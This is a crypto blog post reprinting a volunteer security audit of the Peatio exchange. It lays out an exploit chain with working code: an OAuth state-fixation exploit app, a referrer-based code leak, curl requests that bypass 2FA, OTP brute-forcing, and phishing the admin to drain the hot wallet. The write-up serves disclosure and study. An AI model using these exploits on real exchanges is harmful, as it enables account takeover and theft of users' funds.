• Crypto Lists
  • Bitcoin
  • Blockchain
  • Cryptocurrency
  • Altcoin
  • Advertise With Us
  • Join our Telegram Community
Newsletter
ItsBlockchain
  • Blockchain
  • Bitcoin
    crypto traders 2021

    Top 5 Crypto traders to follow on Twitter in 2021

    featured image

    Everything you need to know about Bitcoin IRA

    featured image

    How Bitcoin can be hacked?

    featured

    A starter guide to Bitcoin Options trading

    Featured Image

    With Bitcoin Mining Capitulation Coming to an End, Will Halving Pump Begin?

    featured image

    Technical Indicators suggests Bitcoin can crash to 7000$ in next few days

    featured image

    Why is Bitcoin a safe haven in a financial crisis

    featured image

    How to Make Money in Crypto When It Falls

    featured image

    Despite Resurrection of Old Bitcoiners, HODL Waves Indicate Bullish Accumulation

    Trending Tags

    • Altcoin
    • Crypto Lists
    • News
      bitcoin laser eyes

      Bitcoin Laser Eyes, What is it all about?

      Bitcoin Market’s Sentiments turned bullish after USA President’s recent press conference

      Bitcoin Market’s Sentiments turned bullish after USA President’s recent press conference

      featured image

      Breaking : Crypto Trading is now legal in South Korea

      RBI to allow crypto trading

      Supreme court of India decided to lift off RBI Banking BAN against Bitcoin

      featured image

      Steemit Joining TRON Ecosystem

      Reliance Jiocoin

      Reliance Jio is preparing for Jio Coin launch in 2020

      A $134 Million real estate has sold on ethereum blockchain

      A $134 Million real estate has sold on ethereum blockchain

      Hacking attacks on cryptocurrency exchanges

      Hacking Attacks on Cryptocurrency Exchanges are rising, Why?

      Bithumb Launches in India

      Bithumb Global Launches in India

    • Crypto Market
    • Guide
    • DEFI
    No Result
    View All Result
    • Blockchain
    • Bitcoin
      crypto traders 2021

      Top 5 Crypto traders to follow on Twitter in 2021

      featured image

      Everything you need to know about Bitcoin IRA

      featured image

      How Bitcoin can be hacked?

      featured

      A starter guide to Bitcoin Options trading

      Featured Image

      With Bitcoin Mining Capitulation Coming to an End, Will Halving Pump Begin?

      featured image

      Technical Indicators suggests Bitcoin can crash to 7000$ in next few days

      featured image

      Why is Bitcoin a safe haven in a financial crisis

      featured image

      How to Make Money in Crypto When It Falls

      featured image

      Despite Resurrection of Old Bitcoiners, HODL Waves Indicate Bullish Accumulation

      Trending Tags

      • Altcoin
      • Crypto Lists
      • News
        bitcoin laser eyes

        Bitcoin Laser Eyes, What is it all about?

        Bitcoin Market’s Sentiments turned bullish after USA President’s recent press conference

        Bitcoin Market’s Sentiments turned bullish after USA President’s recent press conference

        featured image

        Breaking : Crypto Trading is now legal in South Korea

        RBI to allow crypto trading

        Supreme court of India decided to lift off RBI Banking BAN against Bitcoin

        featured image

        Steemit Joining TRON Ecosystem

        Reliance Jiocoin

        Reliance Jio is preparing for Jio Coin launch in 2020

        A $134 Million real estate has sold on ethereum blockchain

        A $134 Million real estate has sold on ethereum blockchain

        Hacking attacks on cryptocurrency exchanges

        Hacking Attacks on Cryptocurrency Exchanges are rising, Why?

        Bithumb Launches in India

        Bithumb Global Launches in India

      • Crypto Market
      • Guide
      • DEFI
      No Result
      View All Result
      ItsBlockchain
      No Result
      View All Result
      Home bitcoin

      Beware ! Your Bitcoins can be stolen at any point of time

      Hitesh Malviya by Hitesh Malviya
      March 4, 2020
      in bitcoin, Cryptocurrency
      0 0
      0
      bitcoin hacking
      0
      SHARES
      135
      VIEWS
      Share on FacebookShare on Twitter

      There are 2630 cryptocurrency exchanges are available  & The list is increasing by each passing day. Which exchange to choose when it comes to store your crypto assets?  If you follow bitcoin space, you must have heard about Hacking attacks on Top Bitcoin echange Bitfinex last year.

      If the best exchange could went hacking, How sure we are about others. This is an eye opener post about security of these exchanges. 75% of exchanges are still vulnerable to cyber attack and Can be hacked at any point of time. You all must be waiting for bitcoin price to go down, Wait my friend, One such cyber attack and Bitcoin Price will fall drastically.

      I am going to present a case study done by SAKURITY on Bitcoin Hacking in this post.

      UPDATE: Once again – no one was hacked in reality and the audit was conducted for free. This post is simply an attack scenario. You can download the final report and see clarifications here.

      For a while we’ve been looking for a project to conduct volunteer security audit. Recently we found a perfect suit for us – an open source crypto currency exchange Peatio powered by Rails.

      We dedicated 8 hours to find a way to do the worst you can do with a Bitcoin exchange – steal the hot wallet. The mission was partially accomplished and we found an interesting chain of critical vulnerabilities.

      Step 1. Hijacking the account

      Peatio has “Connect Weibo account” feature built-in. According to OAuth Security Cheatsheet, poorly implemented OAuth is a reliable way to take over an account.

      Connecting attacker’s weibo account to the victim’s Peatio account

      omniauth-weibo-oauth2 gem was vulnerable to state fixation. We can set state to an arbitrary value (e.g. 123) and apply the attacker’s code instead along with state=123, which will lead to assigning attacker’s weibo to victim’s peatio account. The exact same issue was in omniauth-facebook gem and others omniauth-based libraries copy pasting same vulnerable code. It’s funny that the comment above says “to support omniauth-oauth2’s auto csrf protection” but does the opposite and switches it off.

      The bug can be exploited with following Sinatra app, just add YourWeiboCookies:

      require 'sinatra'
      get '/get_weibo_cb' do
      
        conn = Faraday.new(:url => 'https://api.weibo.com')
        new_url = conn.get do |r|
          r.url "/oauth2/authorize?client_id=456519107&redirect_uri=https%3A%2F%2Fyunbi.com%2Fauth%2Fweibo%2Fcallback&response_type=code&state=123"
      
          r.headers['Cookie'] =<<COOKIE
      YourWeiboCookies
      COOKIE
      
          r.options.timeout = 4        
          r.options.open_timeout = 2
        end.headers["Location"]
        redirect new_url
      end
      
      get '/peatio_demo' do
        response.headers['Content-Security-Policy'] = "img-src 'self' https://yunbi.com"
        "<img src='https://yunbi.com/auth/weibo?state=123'><img src='/get_weibo_cb'>"
      end
      What if the user already has Weibo connected?

      The system is not going to connect another Weibo account but we wanted the exploit to work seamlessly for every possible victim. So we hacked Weibo’s OAuth.

      First, we found out Weibo doesn’t whitelist redirect_uri like Github didn’t. It’s possible to change redirect_uri to another page on the victim domain to leak the code in the Referrer header and then use it to log in victim’s account.

      However there was no such page on Peatio to make it leak. No external images, links or anything. The attack surface was so tiny. But then we found this in DocumentsController:

      if not @doc
        redirect_to(request.referer || root_path)
        return
      end
      

      Following chain of redirects leaks the code by putting it in the # fragment first.

      1. attacker_page redirects to weibo.com/authorize?...redirect_uri=https://app/documents/not_existing_doc%23...
      2. Weibo doesn’t properly parse redirect_uri and redirects the victim to https://app/documents/not_existing_doc#?code=VALID_CODE
      3. Peatio cannot find not_existing_doc and sends back Location header equal request.referrer which is still attacker_page (the browser retains this header while gets redirected)
      4. The browser preserves #?code=VALID_CODE fragment and loads attacker_page#?code=VALID_CODE. Now the code can be leaked with JS via location.hash variable. The code can be used against https://app/auth/weibo/callback to log in the victim’s account.

      So using two bugs above we can hijack any peatio account and only last one requires JS.

      Step 2: Bypassing 2 Factor Authentication

      For users with Google Authenticator activated

      There’s a gaping hole in SmsAuthsController – two_factor_required! is only called for showaction, but not for update which is actually responsible for activating SMS 2FA.

      before_action :auth_member!
      before_action :find_sms_auth
      before_action :activated?
      before_action :two_factor_required!, only: [:show]
      
      def show
        @phone_number = Phonelib.parse(current_user.phone_number).national
      end
      
      def update
        if params[:commit] == 'send_code'
          send_code_phase
        else
          verify_code_phase
        end
      end
      

      We can activate new SMS authenticator simply sending following requests straight to updateaction.

      curl ‘https://app/verify/sms_auth’ -H ‘X-CSRF-Token:ZPwrQuLJ3x7md3wolrCTE6HItxkwOiUNHlekDPRDkwI=’ -H ‘Cookie:_peatio_session=SID’ –data ‘_method=patch&sms_auth%5Bcountry%5D=DE&sms_auth%5B phone_number%5D=9123222211&commit=send_code’

      curl ‘https://app/verify/sms_auth’ -H ‘X-CSRF-Token:ZPwrQuLJ3x7md3wolrCTE6HItxkwOiUNHlekDPRDkwI=’ -H ‘Cookie:_peatio_session=SID’ –data ‘_method=patch&sms_auth%5Bcountry%5D=DE&sms_auth%5B phone_number%5D=9123222211&sms_auth%5Botp%5D=CODE_WE_RECEIVED’

      For users with both Authenticator and SMS

      Peatio doesn’t store failed attempts for OTP so it’s very easy to bruteforce both App and SMS OTPs, it will take less than 3 days. For more details check our OTP Bruteforce Calculator

      For users with SMS 2FA only

      two_factor_by_type method doesn’t use activated scope so even inactive 2FA models can be used. Thus we are not going to brute SMS auth because the victim will start receiving suspicious SMS. We still can bruteforce Google Authenticator because it has seed generated and verify? method is working fine.

      def two_factor_by_type
        current_user.two_factors.by_type(params[:id])
      end
      
      Furthermore, SMS 2FA has two more issues
      def gen_code
        self.otp_secret = OTP_LENGTH.times.map{ Random.rand(9) + 1 }.join
        self.refreshed_at = Time.now
      end
      

      First issue is Random.rand is based on PRNG (Mersenne Twister) which is easily predictable once you have enough subsequently generated numbers.

      Second issue is rand(9) can only generate numbers from 0 to 8 so total number of combinations will be 9^6=531441 almost twice less than 1,000,000 and twice easier to bruteforce than App 2FA.

      With tricks outlined above we can bypass 2FA for any user. In worst case scenario it takes less than 3 days. If the victim has only Google Authenticator it takes less than 5 seconds to set up new SMS authenticator.

      Step 3: Attacking the admin

      Alright, we can hijack the account and bypass 2FA for any user, so we can steal the Bitcoins from anyone who visits our page. Still we need a lot of users to trick into clicking our phishy links. Let’s focus on just one of them – the admin.

      The simplest way to make the admin visit our link is to create a support ticket with something like “What is wrong with my account can you please check? https://i.will.hack.you/now”. Then we hack 2FA to get into the /admin panel:

      Unfortunately, this is the worst part. The admin of Peatio can do just few more things than a regular user. Nothing like “Send all the coins to this bad guy” or “Show API keys of all users”.

        can :update, Proof
        can :manage, Document
        can :manage, Member
        can :manage, Ticket
        can :manage, IdDocument
        can :manage, TwoFactor
        can :menu, Deposit
        can :manage, Deposit
        can :manage, ::Deposits::Bank
        can :manage, ::Deposits::Satoshi
        can :menu, Withdraw
        can :manage, ::Withdraws::Bank
        can :manage, ::Withdraws::Satoshi
      

      The only thing we found is creating a fiat deposit of like 99999999 Chinese Yuan and then accepting it by an admin.

      Then we can buy all available Bitcoins and altcoins to withdraw them. However not all Bitcoins are on orders. Doing it in stealth mode for a week can bring better results than closing all the orders in rush mode.

      Yunbi assets: 1636 BTC in total and ~350 in the hot wallet

      Our bounty: 1 BTC. It wasn’t about money though.

      Finally, the report is available to download.

      IBC-Transparent-Logo-(1)

      Subscribe To Our Newsletter

      Join our mailing list to receive Cryptocurrency investing and trading recommendations to your mailbox.

      You have Successfully Subscribed!

      Tags: bitcoincryptocurrencyexchange
      ShareTweetPin

      Subscribe to get notified on latest posts.

      Unsubscribe

      Related Posts

      Cofounders of Ethereum : The mystery revealed now

      Cofounders of Ethereum : The mystery revealed now

      by om malviya
      February 20, 2021
      0

      In this article we will discuss cofounders of ethereum, and where are they now? Ethereum is without any doubt one...

      Top 10 Altcoins to buy on Uniswap – Part 1

      Top 10 Altcoins to buy on Uniswap – Part 1

      by Hitesh Malviya
      February 21, 2021
      0

      Bitcoin breached 50000$ price level two days ago and building nice support above this mega level. On other hand, altcoins...

      crypto traders 2021

      Top 5 Crypto traders to follow on Twitter in 2021

      by Hitesh Malviya
      February 19, 2021
      0

      Top 5 Crypto Traders to follow on twitter Twitter is a good place to seek free crypto trading advice but...

      featured image

      Everything you need to know about Bitcoin IRA

      by Nivesh Rustgi
      February 12, 2021
      0

      In this article, We will discuss Bitcoin IRAs, Laws and regulations, Service providers and future of bitcoin IRAs. The tax...

      featured image

      How Bitcoin can be hacked?

      by Nivesh Rustgi
      February 5, 2021
      0

      In this article, we will discuss how bitcoin can be hacked. Bitcoin runs on blockchain technology, in fact, it...

      Load More

      About Us

      We share important articles on blockchain technology here. Our mission is to spread the awareness about blockchain technology to masses through content.

      • Trending
      • Comments
      • Latest
      Top 10 Cheap Cryptocurrencies with Huge Potential in 2021 | Best Penny Crypto Coins

      Top 10 Cheap Cryptocurrencies with Huge Potential in 2021 | Best Penny Crypto Coins

      February 22, 2021
      Top 10 Altcoins to buy on Uniswap – Part 1

      Top 10 Altcoins to buy on Uniswap – Part 1

      February 21, 2021
      non fungible token

      Non-fungible Token(NFT): The Next Big Thing in Crypto Market

      February 18, 2021
      crypto traders 2021

      Top 5 Crypto traders to follow on Twitter in 2021

      February 19, 2021
      TOP TEN altcoins to buy in february 2021

      Top Ten Altcoins You Should Buy in February 2021 – Part 2

      February 9, 2021
      featured image

      Top 10 Low market cap altcoins to invest in 2021

      February 24, 2021
      bitcoin laser eyes

      Bitcoin Laser Eyes, What is it all about?

      February 20, 2021
      A simple guide to understanding FTX Bull and Bear tokens

      A simple guide to understanding FTX Bull and Bear tokens

      February 24, 2021
      featured image

      Top 10 Low market cap altcoins to invest in 2021

      February 24, 2021
      featured image

      Top 10 Blockchain companies in the world

      February 22, 2021
      Handle crypto Trading Losses

      How to Handle Trading Losses

      February 21, 2021
      bitcoin laser eyes

      Bitcoin Laser Eyes, What is it all about?

      February 20, 2021
      Cofounders of Ethereum : The mystery revealed now

      Cofounders of Ethereum : The mystery revealed now

      February 20, 2021
      Top 10 Altcoins to buy on Uniswap – Part 1

      Top 10 Altcoins to buy on Uniswap – Part 1

      February 21, 2021
      • Top 10 Cheap Cryptocurrencies with Huge Potential in 2021 | Best Penny Crypto Coins

        Top 10 Cheap Cryptocurrencies with Huge Potential in 2021 | Best Penny Crypto Coins

        0 shares
        Share 0 Tweet 0
      • Top Ten Altcoins You Should Buy in February 2021 – Part 1

        0 shares
        Share 0 Tweet 0
      • Top Ten Altcoins You Should Buy in February 2021 – Part 2

        0 shares
        Share 0 Tweet 0
      • List of leading partners of Ripple, and How they use XRP?

        137 shares
        Share 137 Tweet 0
      • List of ChainLink Partnerships which skyrocketed the growth of LINK cryptocurrency

        55 shares
        Share 55 Tweet 0

      cointraffic

      ItsBlockchain

      We are India’s first and oldest Blockchain & Cryptocurrency publication platform started in 2016. We are a one-stop destination for technical analysis, cryptocurrency recommendations, and Blockchain technology resources.

      Buying Guides

      • Buy Bitcoins in India
      • Buy Bitcoins in China
      • Buy bitcoins in Russia
      • Buy Bitcoins in Japan
      • Buy Bitcoins in Turkey

      Important Links

      • Home
      • About US
      • Privacy Policy
      • Promote Your ICO
      • Submit post

      Follow Us

      Contact us

      support@itsblockchain.com

      © 2020 itsblockchain.com - Designed and maintained by Fanatic Coders

      No Result
      View All Result
      • About US
      • DEFI
      • Home
      • Newsletter
      • Privacy Policy
      • Promote Your ICO
      • Submit post

      © 2020 itsblockchain.com - Designed and maintained by Fanatic Coders

      Login to your account below

      Forgotten Password?

      Fill the forms bellow to register

      All fields are required. Log In

      Retrieve your password

      Please enter your username or email address to reset your password.

      Log In
      This website uses cookies. By continuing to use this website you are giving consent to cookies being used. Visit our Privacy and Cookie Policy.